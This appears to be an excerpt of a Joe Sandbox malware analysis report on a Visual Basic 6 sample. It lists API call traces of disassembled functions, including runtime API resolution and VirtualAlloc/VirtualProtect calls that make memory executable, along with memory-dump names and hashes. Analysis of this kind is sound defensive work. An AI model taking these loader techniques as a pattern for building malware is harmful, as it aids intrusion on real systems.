#698.MSVBVM60(?,00000020), ref: 004FBBCF
#606.MSVBVM60(?,?,?,00000020), ref: 004FBBE4
__vbaStrMove.MSVBVM60(?,?,?,00000020), ref: 004FBBEE
__vbaStrCopy.MSVBVM60(?,?,?,00000020), ref: 004FBBF7
__vbaFreeStr.MSVBVM60(?,?,?,00000020), ref: 004FBBFF
__vbaFreeVar.MSVBVM60(?,?,?,00000020), ref: 004FBC07
#644.MSVBVM60(005022A0,?,?,?,00000020), ref: 004FBC0E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FBC36
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FBC5B
#698.MSVBVM60(?,00000020), ref: 004FBC66
#606.MSVBVM60(?,?,?,00000020), ref: 004FBC7B
__vbaStrMove.MSVBVM60(?,?,?,00000020), ref: 004FBC85
__vbaStrCopy.MSVBVM60(?,?,?,00000020), ref: 004FBC8E
__vbaFreeStr.MSVBVM60(?,?,?,00000020), ref: 004FBC96
__vbaFreeVar.MSVBVM60(?,?,?,00000020), ref: 004FBC9E
#644.MSVBVM60(?,?,?,?,00000020), ref: 004FBCA5
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FBCCD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FBCF2
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000), ref: 004FBD14
__vbaAryLock.MSVBVM60(?,?), ref: 004FBD22
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FBD72
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000), ref: 004FBD90
__vbaAryLock.MSVBVM60(?,?), ref: 004FBD9E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FBDC9
__vbaAryUnlock.MSVBVM60(?), ref: 004FBDD2
__vbaAryUnlock.MSVBVM60(?), ref: 004FBDDB
__vbaAryUnlock.MSVBVM60(?,004FBE5C), ref: 004FBE28
__vbaAryDestruct.MSVBVM60(00000000,?,?,004FBE5C), ref: 004FBE33
__vbaFreeObj.MSVBVM60(00000000,?,?,004FBE5C), ref: 004FBE3B
__vbaFreeObj.MSVBVM60(00000000,?,?,004FBE5C), ref: 004FBE43
__vbaAryDestruct.MSVBVM60(00000000,?,00000000,?,?,004FBE5C), ref: 004FBE4E
__vbaFreeObj.MSVBVM60(00000000,?,00000000,?,?,004FBE5C), ref: 004FBE56

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$Free$CheckHresult$Move$Copy$LockUnlock$Addref$#644Redim$#698$#606Destruct$#607List
String ID:
API String ID: 844423419-0
Opcode ID: 3dcb49cc3a37dbff05000aed2ffd19149b0dabac2d9136581919e8d21046880e
Instruction ID: 1dfdef46ee2a8d9599e7190eb775b25752a7f3fddfafa07b0f52f821d0789b03
Opcode Fuzzy Hash: 3dcb49cc3a37dbff05000aed2ffd19149b0dabac2d9136581919e8d21046880e
Instruction Fuzzy Hash: AC620B71900208ABCF14EFA5CC85EEEB7B9FF49704F14456EF205BB1A1DB3999058B64

Function 004FF318 Relevance: 109.1, APIs: 61, Strings: 1, Instructions: 581
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004F9F8B: __vbaStrCat.MSVBVM60(0040B650,0040B648), ref: 004FA013
Part of subcall function 004F9F8B: __vbaStrMove.MSVBVM60(0040B650,0040B648), ref: 004FA01D
Part of subcall function 004F9F8B: __vbaStrCat.MSVBVM60(bvm,00000000,0040B650,0040B648), ref: 004FA028
Part of subcall function 004F9F8B: __vbaStrMove.MSVBVM60(bvm,00000000,0040B650,0040B648), ref: 004FA032
Part of subcall function 004F9F8B: __vbaStrCat.MSVBVM60(0040B668,00000000,bvm,00000000,0040B650,0040B648), ref: 004FA03D
Part of subcall function 004F9F8B: GetModuleHandleW.KERNEL32(00000000,?,0040B668,00000000,bvm,00000000,0040B650,0040B648), ref: 004FA055
Part of subcall function 004F9F8B: __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,0040B668,00000000,bvm,00000000,0040B650,0040B648), ref: 004FA069
Part of subcall function 004F9F8B: __vbaFreeVar.MSVBVM60 ref: 004FA074
Part of subcall function 004F9F8B: __vbaStrVarVal.MSVBVM60(?,?,?), ref: 004FA0A6
Part of subcall function 004F9F8B: __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?), ref: 004FA0B0
Part of subcall function 004F9F8B: GetProcAddress.KERNEL32(00000000,?), ref: 004FA0BC

Part of subcall function 004FF241: __vbaSetSystemError.MSVBVM60(000000FF,00000022,?,00000004), ref: 004FF283

__vbaFreeVar.MSVBVM60(?), ref: 004FF37D

Part of subcall function 004FAF77: #644.MSVBVM60(?,004BDA58), ref: 004FAFBA
Part of subcall function 004FAF77: __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,00000000,00000000,?,004BDA58), ref: 004FAFE1
Part of subcall function 004FAF77: __vbaAryLock.MSVBVM60(?,?,00000000,00000000,?,004BDA58), ref: 004FAFEF
Part of subcall function 004FAF77: #644.MSVBVM60(?,?,?,00000000,00000000,?,004BDA58), ref: 004FAFFE
Part of subcall function 004FAF77: __vbaAryUnlock.MSVBVM60(?,?,?,?,00000000,00000000,?,004BDA58), ref: 004FB009

__vbaAryLock.MSVBVM60(004FF2F8,005032F8,?), ref: 004FF3B4
#644.MSVBVM60(89645E5F,004FF2F8,005032F8,?), ref: 004FF3C3
__vbaAryUnlock.MSVBVM60(004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF3CE

Part of subcall function 004FEF43: #644.MSVBVM60(?,00000000,0040BEAC,00000080), ref: 004FEF8D
Part of subcall function 004FEF43: #644.MSVBVM60(?,00000000,-00000008,?,00000000,0040BEAC,00000080), ref: 004FEFA5
Part of subcall function 004FEF43: #644.MSVBVM60(00000016,00000000,-00000004,?,00000000,-00000008,?,00000000,0040BEAC,00000080), ref: 004FEFC5
Part of subcall function 004FEF43: #644.MSVBVM60(00000000,00000000,00000000,00000016,00000000,-00000004,?,00000000,-00000008,?,00000000,0040BEAC,00000080), ref: 004FEFD7
Part of subcall function 004FEF43: #644.MSVBVM60(00000000,00000000,00000000,00000000,00000016,00000000,-00000004,?,00000000,-00000008,?,00000000,0040BEAC,00000080), ref: 004FEFE3

__vbaObjSet.MSVBVM60(?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF3F7
__vbaObjSetAddref.MSVBVM60(005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF406
__vbaFreeObj.MSVBVM60(005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF40E
__vbaObjSetAddref.MSVBVM60(?,00000000,005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF424
#644.MSVBVM60(00000000,?,00000000,005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF42A
__vbaFreeObj.MSVBVM60(00000000,?,00000000,005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F,004FF2F8,005032F8,?), ref: 004FF43B
__vbaObjSetAddref.MSVBVM60(?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8,89645E5F), ref: 004FF45D

Part of subcall function 004FB547: __vbaObjSetAddref.MSVBVM60(?,?), ref: 004FB5AE
Part of subcall function 004FB547: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BEAC,0000000C), ref: 004FB5D8
Part of subcall function 004FB547: __vbaObjSetAddref.MSVBVM60(?,?), ref: 004FB5F7
Part of subcall function 004FB547: __vbaStrVarMove.MSVBVM60(?,?,00000000,?,?), ref: 004FB613
Part of subcall function 004FB547: __vbaStrMove.MSVBVM60(?,?,00000000,?,?), ref: 004FB61D
Part of subcall function 004FB547: __vbaStrCopy.MSVBVM60(?,?,00000000,?,?), ref: 004FB62A
Part of subcall function 004FB547: __vbaFreeStr.MSVBVM60(?,?,00000000,?,?), ref: 004FB632
Part of subcall function 004FB547: __vbaFreeObj.MSVBVM60(?,?,00000000,?,?), ref: 004FB63A
Part of subcall function 004FB547: __vbaFreeVar.MSVBVM60(?,?,00000000,?,?), ref: 004FB642
Part of subcall function 004FB547: __vbaObjSetAddref.MSVBVM60(?,?,?,?,00000000,?,?), ref: 004FB64E
Part of subcall function 004FB547: __vbaStrVarMove.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 004FB66A
Part of subcall function 004FB547: __vbaStrMove.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 004FB674

__vbaFreeObj.MSVBVM60(00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8), ref: 004FF470
__vbaFreeVar.MSVBVM60(?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000), ref: 004FF4F2
__vbaFreeVar.MSVBVM60(?,?,005032B8,?,00000000,00000000,00000000,000000FF,00000000,?,00000000,00503300,00503330,00000000,?,00000000), ref: 004FF542
__vbaSetSystemError.MSVBVM60(00000000,?,?,005032B8,?,00000000,00000000,00000000,000000FF,00000000,?,00000000,00503300,00503330,00000000,?), ref: 004FF54D
__vbaFreeVar.MSVBVM60(?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000), ref: 004FF591
__vbaSetSystemError.MSVBVM60(00000000,?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?), ref: 004FF59C
__vbaFreeVar.MSVBVM60(?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000), ref: 004FF5EB
__vbaSetSystemError.MSVBVM60(00000000,?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?), ref: 004FF5F6
__vbaFreeVar.MSVBVM60(?,?,005032B8,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000), ref: 004FF643
__vbaSetSystemError.MSVBVM60(00000000,?,?,005032B8,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,00503300,00503330,00000000,?), ref: 004FF64E
__vbaFreeVar.MSVBVM60(?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000), ref: 004FF696
__vbaSetSystemError.MSVBVM60(00000000,?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?), ref: 004FF6A1
__vbaFreeVar.MSVBVM60(?,?,005032B8,?,00000000,00000000,000000FF,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000), ref: 004FF6EE
__vbaSetSystemError.MSVBVM60(00000000,?,?,005032B8,?,00000000,00000000,000000FF,00000000,00000000,?,00000000,00503300,00503330,00000000,?), ref: 004FF6F9
__vbaFreeVar.MSVBVM60(?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000), ref: 004FF741
__vbaSetSystemError.MSVBVM60(00000000,?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?), ref: 004FF74C
__vbaFreeVar.MSVBVM60(?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000), ref: 004FF794
__vbaSetSystemError.MSVBVM60(00000000,?,?,005032B8,?,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?), ref: 004FF79F
__vbaAryLock.MSVBVM60(?,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000,?,?), ref: 004FF7D2
__vbaStrMove.MSVBVM60(00502440,?,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000,?), ref: 004FF7FC
__vbaAryLock.MSVBVM60(004FF2F8,00000000,00502440,?,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?), ref: 004FF80D
__vbaStrMove.MSVBVM60(004FF2F8,00000000,00502440,?,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?), ref: 004FF81C
__vbaStrCat.MSVBVM60(0040C440,00000000,004FF2F8,00000000,00502440,?,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4), ref: 004FF827
__vbaStrMove.MSVBVM60(0040C440,00000000,004FF2F8,00000000,00502440,?,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4), ref: 004FF831
__vbaStrCat.MSVBVM60(00000000,00000000,0040C440,00000000,004FF2F8,00000000,00502440,?,00000000,00000000,?,00000000,00503300,00503330,00000000,?), ref: 004FF839
__vbaStrMove.MSVBVM60(00000000,00000000,0040C440,00000000,004FF2F8,00000000,00502440,?,00000000,00000000,?,00000000,00503300,00503330,00000000,?), ref: 004FF843
__vbaStrCat.MSVBVM60(?,00000000,00000000,00000000,0040C440,00000000,004FF2F8,00000000,00502440,?,00000000,00000000,?,00000000,00503300,00503330), ref: 004FF84C

Part of subcall function 004FAE72: __vbaVarVargNofree.MSVBVM60 ref: 004FAEB6
Part of subcall function 004FAE72: __vbaStrVarVal.MSVBVM60(?,00000000), ref: 004FAEC0
Part of subcall function 004FAE72: #644.MSVBVM60(00000000,?,00000000), ref: 004FAEC6
Part of subcall function 004FAE72: __vbaSetSystemError.MSVBVM60(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 004FAEE3
Part of subcall function 004FAE72: __vbaFreeStr.MSVBVM60(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 004FAEEB
Part of subcall function 004FAE72: __vbaAryLock.MSVBVM60(?,?,?,00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 004FAF0E
Part of subcall function 004FAE72: __vbaSetSystemError.MSVBVM60(00000000,?,?,?,00000000,?,?,?,00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000), ref: 004FAF2B
Part of subcall function 004FAE72: __vbaAryUnlock.MSVBVM60(?,00000000,?,?,?,00000000,?,?,?,00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 004FAF34
Part of subcall function 004FAE72: __vbaSetSystemError.MSVBVM60(00000000,?,00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,?,00000000), ref: 004FAF3F

__vbaAryUnlock.MSVBVM60(004FF2F8,00000008,C3FFF02E,?,00000000,00000000,00000000,0040C440,00000000,004FF2F8,00000000,00502440,?,00000000,00000000,?), ref: 004FF881
__vbaFreeStrList.MSVBVM60(00000004,?,00000040,?,00000000,004FF2F8,00000008,C3FFF02E,?,00000000,00000000,00000000,0040C440,00000000,004FF2F8,00000000), ref: 004FF898
__vbaFreeVar.MSVBVM60(005032F8,?), ref: 004FF8A3

Part of subcall function 004FB424: __vbaStrCopy.MSVBVM60 ref: 004FB467
Part of subcall function 004FB424: #526.MSVBVM60(?,00000104), ref: 004FB476
Part of subcall function 004FB424: __vbaStrVarMove.MSVBVM60(?,?,00000104), ref: 004FB47F
Part of subcall function 004FB424: __vbaStrMove.MSVBVM60(?,?,00000104), ref: 004FB489
Part of subcall function 004FB424: __vbaFreeVar.MSVBVM60(?,?,00000104), ref: 004FB491
Part of subcall function 004FB424: __vbaSetSystemError.MSVBVM60(?,00000000,00000104,?,?,?,?,00000104), ref: 004FB4CE
Part of subcall function 004FB424: #616.MSVBVM60(?,00000000,?,00000000,00000104,?,?,?,?,00000104), ref: 004FB4DB
Part of subcall function 004FB424: __vbaStrMove.MSVBVM60(?,00000000,?,00000000,00000104,?,?,?,?,00000104), ref: 004FB4E5
Part of subcall function 004FB424: __vbaStrCopy.MSVBVM60(?,00000000,00000104,?,?,?,?,00000104), ref: 004FB4FF
Part of subcall function 004FB424: __vbaFreeStr.MSVBVM60(004FB533,?,00000000,00000104,?,?,?,?,00000104), ref: 004FB525
Part of subcall function 004FB424: __vbaFreeStr.MSVBVM60(004FB533,?,00000000,00000104,?,?,?,?,00000104), ref: 004FB52D

__vbaStrMove.MSVBVM60(?,005032F8,?), ref: 004FF8B5
__vbaStrCat.MSVBVM60(0040C440,00000000,?,005032F8,?), ref: 004FF8C0
__vbaStrMove.MSVBVM60(0040C440,00000000,?,005032F8,?), ref: 004FF8CA
__vbaStrCat.MSVBVM60(00000000,00000000,0040C440,00000000,?,005032F8,?), ref: 004FF8D2
__vbaStrMove.MSVBVM60(00000000,00000000,0040C440,00000000,?,005032F8,?), ref: 004FF8DC
__vbaStrCat.MSVBVM60(?,00000000,00000000,00000000,0040C440,00000000,?,005032F8,?), ref: 004FF8E5
__vbaStrMove.MSVBVM60(?,00000000,00000000,00000000,0040C440,00000000,?,005032F8,?), ref: 004FF8EF

Part of subcall function 004F9D43: __vbaStrCopy.MSVBVM60(00000000,00503300,00004008), ref: 004F9D8F
Part of subcall function 004F9D43: __vbaVarSub.MSVBVM60(?,?,?,00000000,?,?,?,00000000,00503300,00004008), ref: 004F9DCE
Part of subcall function 004F9D43: __vbaI4Var.MSVBVM60(00000000,?,?,?,00000000,?,?,?,00000000,00503300,00004008), ref: 004F9DD4
Part of subcall function 004F9D43: __vbaRedim.MSVBVM60(00000080,00000001,00503218,00000011,00000001,00000000,00000000,?,?,?,00000000,?,?,?,00000000,00503300), ref: 004F9DE8
Part of subcall function 004F9D43: __vbaFreeVar.MSVBVM60(00000000,?,?,?,00000000,00503300,00004008), ref: 004F9DF3
Part of subcall function 004F9D43: __vbaStr2Vec.MSVBVM60(?,?,00000000,?,?,?,00000000,00503300,00004008), ref: 004F9DFF
Part of subcall function 004F9D43: __vbaAryMove.MSVBVM60(?,?,?,?,00000000,?,?,?,00000000,00503300,00004008), ref: 004F9E0C
Part of subcall function 004F9D43: __vbaVarSub.MSVBVM60(?,?,?,?,00004008,?,?,?,?,?,00000000,?,?,?,00000000,00503300), ref: 004F9E44
Part of subcall function 004F9D43: __vbaI4Var.MSVBVM60(00000000,?,?,?,?,00004008,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004F9E4A
Part of subcall function 004F9D43: __vbaFreeVar.MSVBVM60(00000000,?,?,?,?,00004008,?,?,?,?,?,00000000,?,?,?,00000000), ref: 004F9E54

__vbaStrVarVal.MSVBVM60(00000000,00000008,00000008,00000000,?,00000000,00000000,00000000,0040C440,00000000,?,005032F8,?), ref: 004FF906
#644.MSVBVM60(00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,00000000,0040C440,00000000,?,005032F8,?), ref: 004FF90C
__vbaSetSystemError.MSVBVM60(00000000,00000001,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,00000000,0040C440,00000000,?,005032F8,?), ref: 004FF919
__vbaFreeStrList.MSVBVM60(00000005,?,00000040,?,00000000,00000000,00000000,00000001,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000), ref: 004FF934
__vbaFreeVar.MSVBVM60(00000000,00000000,00000000,0040C440,00000000,?,005032F8,?), ref: 004FF93F
__vbaAryUnlock.MSVBVM60(?,00000000,00000000,00000000,0040C440,00000000,?,005032F8,?), ref: 004FF948
__vbaSetSystemError.MSVBVM60(00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000,?,?,005032F8), ref: 004FF982
__vbaAryLock.MSVBVM60(004FF2F8,00000000,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000,?), ref: 004FF99C

Part of subcall function 004FB0FC: #644.MSVBVM60(?,004EBCC9), ref: 004FB150
Part of subcall function 004FB0FC: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,00000000,00000004,?,004EBCC9), ref: 004FB171
Part of subcall function 004FB0FC: __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,00000000,?,00003000,00000040,00000000,00000000,00000004,?,004EBCC9), ref: 004FB18D
Part of subcall function 004FB0FC: __vbaAryLock.MSVBVM60(?,?,00000000,00000004,?,004EBCC9), ref: 004FB19C
Part of subcall function 004FB0FC: #644.MSVBVM60(?,?,?,00000000,00000004,?,004EBCC9), ref: 004FB1AB
Part of subcall function 004FB0FC: __vbaAryUnlock.MSVBVM60(?,?,?,?,00000000,00000004,?,004EBCC9), ref: 004FB1B6
Part of subcall function 004FB0FC: __vbaAryLock.MSVBVM60(?,?,00000000,-00000004,?,?,?,?,?,00000000,00000004,?,004EBCC9), ref: 004FB1D7
Part of subcall function 004FB0FC: #644.MSVBVM60(?,?,?,00000000,-00000004,?,?,?,?,?,00000000,00000004,?,004EBCC9), ref: 004FB1E6
Part of subcall function 004FB0FC: __vbaAryUnlock.MSVBVM60(?,?,?,?,00000000,-00000004,?,?,?,?,?,00000000,00000004,?,004EBCC9), ref: 004FB1F1
Part of subcall function 004FB0FC: __vbaAryLock.MSVBVM60(?,00000000,?,00401006,00000000,00000000,?,?,?,?,?,00000000,-00000004,?,?,?), ref: 004FB216

__vbaAryUnlock.MSVBVM60(004FF2F8,?,?,?,004FF2F8,00000000,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4), ref: 004FF9C6
__vbaFreeVar.MSVBVM60(004FF2F8,?,?,?,004FF2F8,00000000,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4), ref: 004FF9CE
#644.MSVBVM60(00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000,?,?,005032F8,004FF2F8), ref: 004FF9D9
#644.MSVBVM60(-00000004,00000000,00000000,?,00000000,00503300,00503330,00000000,?,00000000,005032F4,00000000,?,00000000,?,?), ref: 004FF9F3
__vbaAryUnlock.MSVBVM60(?,004FFA51,?), ref: 004FFA4B

Strings

P$P, xrefs: 004FF33C

Memory Dump Source

Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd

Similarity

API ID: __vba$Free$Move$#644$ErrorSystem$LockUnlock$Addref$Copy$ListRedim$#526#616AddressAllocAnsiCheckHandleHresultModuleNofreeProcStr2VargVirtual
String ID: P$P
API String ID: 551447660-159270896
Opcode ID: 553f291f0f747e983998f026e747dca2e32c171b32f163b8e801cedfd75e318a
Instruction ID: db506244587a8e4b5ed4fd47b367a1be35ae69282482a22f34a39c9f3ae64843
Opcode Fuzzy Hash: 553f291f0f747e983998f026e747dca2e32c171b32f163b8e801cedfd75e318a
Instruction Fuzzy Hash: E822F2B5C0010DABCB15EFA5D881DEEB7BCAF18304B14413FE615B7261DB38AA09DB65

Function 004FD671 Relevance: 105.4, APIs: 58, Strings: 2, Instructions: 409
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,0000000F,00000000,?,00000000,?), ref: 004FD6D3
__vbaNew.MSVBVM60(0040BD5C,0040BD6C,?,?,?,?,?,00000000,?), ref: 004FD6E5
__vbaObjSet.MSVBVM60(?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,00000000,?), ref: 004FD6EF
__vbaCastObj.MSVBVM60(00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,00000000,?), ref: 004FD6F5
__vbaObjSet.MSVBVM60(00000000,00000000,00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,00000000,?), ref: 004FD6FF
__vbaFreeObj.MSVBVM60(00000000,00000000,00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,00000000,?), ref: 004FD707
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000,00000000,00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,00000000,?), ref: 004FD713
#644.MSVBVM60(00000000,?,00000000,00000000,00000000,00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,00000000), ref: 004FD719
__vbaFreeObj.MSVBVM60(00000000,?,00000000,00000000,00000000,00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,00000000), ref: 004FD724
#644.MSVBVM60(00401006,00000000,?,00000000,00000000,00000000,00000000,?,00000000,0040BD5C,0040BD6C), ref: 004FD72D
#644.MSVBVM60(?,00401006,00000000,?,00000000,00000000,00000000,00000000,?,00000000,0040BD5C,0040BD6C), ref: 004FD739
#644.MSVBVM60(00401006,?,00401006,00000000,?,00000000,00000000,00000000,00000000,?,00000000,0040BD5C,0040BD6C), ref: 004FD744
#644.MSVBVM60(?,00401006,?,00401006,00000000,?,00000000,00000000,00000000,00000000,?,00000000,0040BD5C,0040BD6C), ref: 004FD750
__vbaAryLock.MSVBVM60(?,?,?,00000000,00000000,?,00401006,?,00401006,00000000,?,00000000,00000000,00000000,00000000,?), ref: 004FD777
#644.MSVBVM60(?,?,?,?,00000000,00000000,?,00401006,?,00401006,00000000,?,00000000,00000000,00000000,00000000), ref: 004FD78B
__vbaAryUnlock.MSVBVM60(?,?,?,?,?,00000000,00000000,?,00401006,?,00401006,00000000,?,00000000,00000000,00000000), ref: 004FD797
__vbaObjSetAddref.MSVBVM60(?,00000000,?,00000000,00000000,?,00401006,?,00401006,00000000,?,00000000,00000000,00000000,00000000,?), ref: 004FD7B7
#644.MSVBVM60(00000000,?,00000000,?,00000000,00000000,?,00401006,?,00401006,00000000,?,00000000,00000000,00000000,00000000), ref: 004FD7BD
__vbaFreeObj.MSVBVM60(00000000,?,00000000,?,00000000,00000000,?,00401006,?,00401006,00000000,?,00000000,00000000,00000000,00000000), ref: 004FD7C8
#644.MSVBVM60(?,00000000,?,00000000,?,00000000,00000000,?,00401006,?,00401006,00000000,?,00000000,00000000,00000000), ref: 004FD7D1
__vbaAryLock.MSVBVM60(?,?,00401006,00000000,?,00000000,?,00000000,?,00000000,00000000,?,00401006,?,00401006,00000000), ref: 004FD7E6
#644.MSVBVM60(?,?,?,00401006,00000000,?,00000000,?,00000000,?,00000000,00000000,?,00401006,?,00401006), ref: 004FD7FA
__vbaAryUnlock.MSVBVM60(?,?,?,?,00401006,00000000,?,00000000,?,00000000,?,00000000,00000000,?,00401006,?), ref: 004FD806
#644.MSVBVM60(?,?,?,?,?,00401006,00000000,?,00000000,?,00000000,?,00000000,00000000,?,00401006), ref: 004FD815
#644.MSVBVM60(005032B0,00000000,00401006,?,?,?,?,?,00401006,00000000,?,00000000,?,00000000,?,00000000), ref: 004FD846
#644.MSVBVM60(?,-0000000C,00000000,005032B0,00000000,00401006,?,?,?,?,?,00401006,00000000,?,00000000,?), ref: 004FD865
__vbaAryLock.MSVBVM60(?,00000000,-0000000C,?,-0000000C,00000000,005032B0,00000000,00401006,?,?,?,?,?,00401006,00000000), ref: 004FD88A
__vbaStrCat.MSVBVM60(0040BCF8,0040BCF0,?,00000040,?,00000000,-0000000C,?,-0000000C,00000000,005032B0,00000000,00401006,?,?,?), ref: 004FD8B1
__vbaStrMove.MSVBVM60(0040BCF8,0040BCF0,?,00000040,?,00000000,-0000000C,?,-0000000C,00000000,005032B0,00000000,00401006,?,?,?), ref: 004FD8BB
__vbaI4Str.MSVBVM60(00000000,0040BCF8,0040BCF0,?,00000040,?,00000000,-0000000C,?,-0000000C,00000000,005032B0,00000000,00401006,?,?), ref: 004FD8C1
VirtualProtect.KERNELBASE(00000000,00000000,00000000,0040BCF8,0040BCF0,?,00000040,?,00000000,-0000000C,?,-0000000C,00000000,005032B0,00000000,00401006), ref: 004FD8CA
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040BD6C,0000002C,?,?,?,?,?,00000000,?), ref: 004FD8DE
__vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,00000000,?), ref: 004FD8E7
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,00000000,?), ref: 004FD8EF
